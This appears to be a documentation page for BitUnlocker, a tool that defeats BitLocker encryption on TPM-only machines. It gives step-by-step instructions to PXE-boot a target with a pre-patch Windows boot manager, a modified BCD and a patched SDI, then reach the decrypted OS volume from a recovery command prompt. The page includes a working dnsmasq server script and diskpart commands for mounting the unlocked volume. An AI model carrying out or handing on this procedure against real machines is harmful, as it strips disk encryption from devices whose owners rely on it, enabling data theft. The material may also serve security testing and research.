Documentation index: https://mintlify.com/garatc/BitUnlocker/llms.txt

The PXE delivery method uses a Linux machine connected to the target via Ethernet to serve the pre-patch bootmgfw.efi and boot_patched.sdi over TFTP. The SDI transfer takes several minutes, but this approach is valuable when USB ports are physically locked or disabled in firmware. The repository's TFTP-root/ directory already contains the pre-patch bootmgfw.efi in the correct layout; you only need to add the modified BCD and boot_patched.sdi, then start dnsmasq.
TFTP-root Layout
After completing the Prepare SDI and Modify BCD steps, your TFTP-root/ directory should contain three files: the pre-patch bootmgfw.efi, which the repository already includes in the appropriate locations within TFTP-root/; the BCD file you produced in Modify BCD, placed at TFTP-root/Boot/BCD; and boot_patched.sdi, placed at TFTP-root/sdi/boot_patched.sdi. Check all three are present before starting the server: a missing BCD or SDI only shows up later as a TFTP "file not found" on the target, after bootmgfw.efi has already loaded.
Start the PXE Server
Connect the target machine to your Linux machine with an Ethernet cable, assign a static IP to that interface, and start dnsmasq on it as a combined DHCP and TFTP server. Use the name of your Ethernet interface (e.g. eth0, enp3s0) wherever <your-interface> appears; run ip link to list available interfaces if you are unsure. Bind dnsmasq to that interface only, so it does not answer DHCP requests on any other network your Linux machine is attached to.
Trigger PXE Boot on the Target
Boot the target into network boot mode using one of these methods:
- From WinRE: In the recovery menu, choose Use a device → IPv4 Network.
- At power-on: Press the manufacturer's PXE boot key as the machine starts (commonly F12 or a dedicated network boot option in the UEFI boot menu).
Either option only appears if UEFI network boot (PXE/IPv4) is enabled in firmware setup.
Wait for the SDI Transfer
Once the target boots, the pre-patch bootmgfw.efi is delivered via TFTP, after which the boot manager reads the BCD and begins downloading boot_patched.sdi. Because the file is approximately 300 MB and TFTP is not designed for bulk transfer, the download over a direct Ethernet link typically takes several minutes. A recovery-related message showing the SDI path will appear on the target's screen while the download is in progress; on the Linux side, dnsmasq's log shows each file as it is sent.
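The server side of the procedure above, from Start the PXE Server through Wait for the SDI Transfer, as an added example that is not code from the BitUnlocker repository: it checks the TFTP-root/ layout, brings up the interface, starts dnsmasq bound to that interface only, and maps dnsmasq's log lines to the boot stage the target has reached. The 192.168.10.0/24 subnet, the server address 192.168.10.1, and the placement of bootmgfw.efi at the top of TFTP-root/ (so the DHCP boot filename is simply bootmgfw.efi) are assumptions of this example, not taken from the page; the sample log lines are constructed, not a real capture.

```bash
#!/bin/sh
# Added example (not code from the BitUnlocker repository). Brings up the
# PXE link, checks the TFTP-root/ layout, starts dnsmasq as DHCP+TFTP on one
# interface only, and turns dnsmasq's log into "which boot stage are we at".
# Assumptions not taken from the page: the 192.168.10.0/24 lab subnet and
# server address 192.168.10.1, and that bootmgfw.efi sits at the top of
# TFTP-root/ so the DHCP boot filename is just "bootmgfw.efi".

PXE_SERVER_IP="192.168.10.1"
PXE_DHCP_RANGE="192.168.10.50,192.168.10.150,1h"

# Files the target requests over TFTP, relative to TFTP-root/. bootmgfw.efi
# ships with the repo; the other two come from Prepare SDI and Modify BCD.
PXE_FILES="bootmgfw.efi Boot/BCD sdi/boot_patched.sdi"

# check_tftp_root ROOT: report each missing file; return 1 if any is missing.
check_tftp_root() {
    root=$1; missing=0
    for f in $PXE_FILES; do
        if [ ! -f "$root/$f" ]; then
            echo "missing: $root/$f" >&2
            missing=1
        fi
    done
    return $missing
}

# dnsmasq_args IFACE ROOT: print the dnsmasq options, one per line.
# --port=0 disables DNS; --bind-interfaces with --interface keeps the DHCP
# server off any other network the Linux box is attached to; the client-arch
# match hands bootmgfw.efi only to x86-64 UEFI clients (PXE arch type 7).
dnsmasq_args() {
    cat <<EOF
--no-daemon
--log-dhcp
--port=0
--interface=$1
--bind-interfaces
--dhcp-range=$PXE_DHCP_RANGE
--dhcp-match=set:efi64,option:client-arch,7
--dhcp-boot=tag:efi64,bootmgfw.efi
--enable-tftp
--tftp-root=$2
EOF
}

# pxe_stage: read dnsmasq log lines on stdin, print each stage transition
# (the highest stage wins, so a DHCP renewal never looks like a regression),
# and exit 0 only once boot_patched.sdi has been fully sent.
pxe_stage() {
    level=0
    while IFS= read -r line; do
        case $line in
            *"failed sending"*) echo "TFTP error: $line" >&2; continue ;;
            *"sent "*/boot_patched.sdi*) n=4; msg="SDI delivered, WinRE loading" ;;
            *"sent "*/Boot/BCD*)         n=3; msg="BCD delivered, SDI download starting" ;;
            *"sent "*/bootmgfw.efi*)     n=2; msg="boot manager delivered" ;;
            *DHCPACK*)                   n=1; msg="DHCP lease handed out" ;;
            *) continue ;;
        esac
        if [ "$n" -gt "$level" ]; then
            level=$n
            echo "stage $level: $msg"
        fi
    done
    [ "$level" -eq 4 ]
}

# pxe_serve IFACE ROOT: the whole procedure. Needs root for ip and dnsmasq.
pxe_serve() {
    check_tftp_root "$2" || return 1
    ip addr replace "$PXE_SERVER_IP/24" dev "$1"
    ip link set "$1" up
    # dnsmasq logs to stderr in --no-daemon mode; keep a copy in pxe.log.
    dnsmasq $(dnsmasq_args "$1" "$2") 2>&1 | tee pxe.log | pxe_stage
}

# Constructed sample of dnsmasq output for a successful boot (not a real capture).
SAMPLE_LOG='dnsmasq-dhcp[4242]: DHCPDISCOVER(eth0) 00:11:22:33:44:55
dnsmasq-dhcp[4242]: DHCPACK(eth0) 192.168.10.50 00:11:22:33:44:55
dnsmasq-tftp[4242]: sent /srv/TFTP-root/bootmgfw.efi to 192.168.10.50
dnsmasq-tftp[4242]: sent /srv/TFTP-root/Boot/BCD to 192.168.10.50
dnsmasq-tftp[4242]: sent /srv/TFTP-root/sdi/boot_patched.sdi to 192.168.10.50'

# Usage: sudo ./pxe-serve.sh <your-interface> /path/to/TFTP-root
if [ "$#" -ge 2 ]; then
    pxe_serve "$1" "$2"
fi
```

Run it as root with the interface name and the path to TFTP-root/; it refuses to start if any of the three files is missing, and the stage lines tell you whether the target is still in DHCP, has pulled the boot manager and BCD, or has finished the long SDI download. The script exits with status 0 only once the SDI has been sent, so it can be chained with whatever you do next.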
Access the Decrypted Volume
Once the SDI finishes loading, a command prompt appears on the target. The TPM will have already unsealed the BitLocker volume master key, so the OS volume is decrypted and should be mounted automatically, typically as C: or E:. This relies on the volume using a TPM-only protector; if a PIN or startup key is also required, the TPM will not release the key on its own and the volume stays locked.
If the volume is not mounted automatically, use diskpart to assign it a letter: list the volumes (list volume), select the one that corresponds to the encrypted OS partition (select volume X, with X replaced by its volume number, identified by its size in the listing), and assign it any drive letter not already in use (assign letter=Z).